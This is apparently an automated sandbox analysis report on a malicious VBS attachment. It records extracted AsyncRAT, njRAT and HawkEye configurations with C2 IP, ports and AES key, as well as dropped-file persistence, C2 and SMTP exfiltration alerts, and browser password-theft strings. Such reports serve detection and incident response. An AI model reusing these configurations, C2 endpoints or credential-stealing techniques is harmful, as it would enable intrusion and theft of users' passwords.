Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQALaURRywvfhLupCLKqRXsTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwMzE5MjMyNjE5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIRg8P1eV241T+5WAoYUJpVxKCp2hnrddZER5q6SuwiuoY5WnvnSHE86fmx6xl/ElyDi0aYdKZQgsRV52AsagcOyXPkYTuqgLaJa0uNP/ccUgEF58GRW9G4hxQ0yFipum00HgR4BC17MH/JlxA70ruPgctyQjb155Y9SA/np83nMY49/v/FNGINUINX7VVQmJkXvhptA0Xg//bKsMYgvjpT7RTp+dgd9Sfl3zZN0vd/OWvtZmjqgWG3FcBdKRjeQU0s8yYApwwz/u+XKy39FcEiIgtDSL4JLpaqgPI07lKqei20ZTjt/AjefXLkBO9i9BJ6cSTUvJL9XmMeWtssOuCLqTg54AQPjvZMVYYvkBhoHEe33fBqgV0/+oIcZpVW2bnRKNN58O1OV7xfp7Uz/K5EoxBGpTI+9BwBf6YdIkPCPsdzkahw4Alz2dm0tR9PiTtvyed571Fse+LSYskswzbfN24cvE183EEfGDdoiCQC9HrIR84g+nkQQKYy5mj5j0BN4NxIW7iuhb2X+a3FlR45KTWpy/p627aKpMeSgG2+zG6Io3gaDSAZ+g6CA+jVqqU81S5PxgZOQk4IbCaJWeyN++/iHEyyFY12jpiNkbVwZWU18Bx48uAZIKBPvpAy7BehRNYRfziR/zErfpf96kYCbDYJzO6/7AkTfQfsO4xhxAgMBAAGjMjAwMB0GA1UdDgQWBBQHQJ8DQO/zUgjsn27YFy2w7xPmbjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAES/vZ9rtg1VF0ZlgPVaWR+J4hq/2Mo1LaJW6+VZmbsT/Kw/eZFxPiwCVqDuLXOk9zdBzQjaN+1jbFORJfRusSdwdAz3ELqtgWOHikAPc0oZfglzOT3wjQWEeahe82N8/FMU/s7gXQ03g2apinU3ySsgT9LdIkEtmwnJ6aLjLFWcKTS5t4hX1dsHSoLs2ulVV8vkTJzmEemZwsHTQmOU13q9B/cezpMx4X9AmoQFdiiGn7p9nsOce7dOD/hlFAVUszv9DY37Qwm12OSvxcP9U/vdVbV7GKkYNkZTzA4r3muyDO1/TMEgngfBFvOXFNlc1JQ+3E0AAoaciCjlGuNbjisKnch5/xrHYe+Lnz3lHhbk6ertrNlT10pfZVrOli47RwIgZhdCmg3915G5n0MaTHUHsUBUET5KTV90kNLTLQLwNq82/0HPWzdFRxJy0RNosBON2awrb8q0Y4N+qVBti0tfpu67a0rwzsZFGEIMIFWvM0JUM8EUrVj86ga7urRpaI/5Al89x4FUeNy3ojdpTRYq3flCWKsnk9p7cMhYXINWZFWdMa1IGGCmlK3YFoEczXqu9D6+zL8Z+xV+pj6rmwzX6PW9RqHIley0P7QBH8iE4AFY1p5PJorWqfs2d68CQuFXOPIunsKtcOzM30OSGck0r6l91Qpdyznv5RK6xaJA==", "ServerSignature": "ISWHB6EJmpETXkSrzzZO+4XR+tFBGrUqWIQgiq+f/Z1utnjjrtR9Zd9ssjAfbUEKoKn1g5ZnXJ3OdA2+5VA6HMPOcjGqbLku4qqYmiWI7nnOg4wV5tgp8fhdBCrJNoe6zLWGVZRFo+FFrnPI9SVkByKFSctFCK2mRMxEPMsqBuOB2yM9abBbLKED5R7WLkNZ9wqoIP6gwufU1ji8pjdVCuYo3OuhkgBL0kjZX3grqk0fHZ4BxsLsdNQMBgTw+W9NV4bKcuxgOo0V6O84Hir+6xsmY32AvEiVEz4+M3CBkWuNsnkjTcKfLI2LJ8Fi2EX6yBS96WSiOpUHxlD+MUGfyDF2QV3Q9nzCyUPTTr04mdeFDpoldcn0kHpsSpyVu1WuW1KS2AN4WdIlSJTOnfm68B/YiVAGvMeZ88eHdnLidkNioBDUtDk5PcS9sTLx0Xorr7wHQf7Fafjphg7NnxrxKOMBhv7k0bUGw3CSqjh/b/SPBjNTohLC1UtOS2tkNuF6syz5zwJ3Id+szSG3tX37C437dOug2ETg7x/O7F9QO/KMDbZ8whpW3X7W0v0mRk9pq0SnEW9Di48x/4FMvNzeTl6n7QV1Bgpv6HZsc3yHpKwz6fYjwhFfzP3WTUSi5cyzFj/bkfk7XJnmM+iNyBmyQoYBMs9OwGuAmLhJD3+yAoU=", "Group": "CONTACTS"}
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack	Malware Configuration Extractor: Njrat {"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "\|'\|'\|", "Install Flag": "False"}
Source: tmpFB21.tmp.exe.4928.13.memstr	Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Metadefender: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Metadefender: Detection: 90%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Metadefender: Detection: 90%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\servieda.exe	Metadefender: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Roaming\servieda.exe	ReversingLabs: Detection: 82%

Multi AV Scanner detection for submitted file

Show sources

Source: PaymentNotification.vbs	Virustotal: Detection: 12%			Perma Link
Source: PaymentNotification.vbs	ReversingLabs: Detection: 17%

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\servieda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Joe Sandbox ML: detected

Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 1.0.Tmp.exe.1d0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.80000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 2.0.pgr.exe.80000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 3.0.servieda.exe.a0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.3a3fd88.3.unpack	Avira: Label: TR/Inject.vcoldi
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe	Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Source: unknown

HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source:	Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe	Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe	Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr	Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr	Binary or memory string: [autorun]

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 4x nop then dec eax
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 4x nop then dec eax
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 4x nop then mov eax, dword ptr [ebp+00000128h]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 4x nop then dec eax
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then jmp 02C91A73h
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then jmp 02C91A73h
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then mov esp, ebp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2021176 ET TROJAN Bladabindi/njRAT CnC Command (ll) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic	Snort IDS: 2019214 ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic	Snort IDS: 2022062 ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager) 185.140.53.71:3429 -> 192.168.2.6:49706
Source: Traffic	Snort IDS: 2019216 ET TROJAN njrat ver 0.7d Malware CnC Callback (Message) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic	Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 185.140.53.71:5622 -> 192.168.2.6:49715
Source: Traffic	Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49726 -> 103.6.196.196:587
Source: Traffic	Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49732 -> 103.6.196.196:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: 185.140.53.71

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.140.53.71 ports 5471,1,4,5,7,5622,3429

May check the online IP address of the machine

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com

Source: global traffic	TCP traffic: 192.168.2.6:49705 -> 185.140.53.71:5471
Source: global traffic	TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.16.154.36 104.16.154.36

Source: Joe Sandbox View

ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587

Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

Code function: 13_2_0101A09A recv,

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	String found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
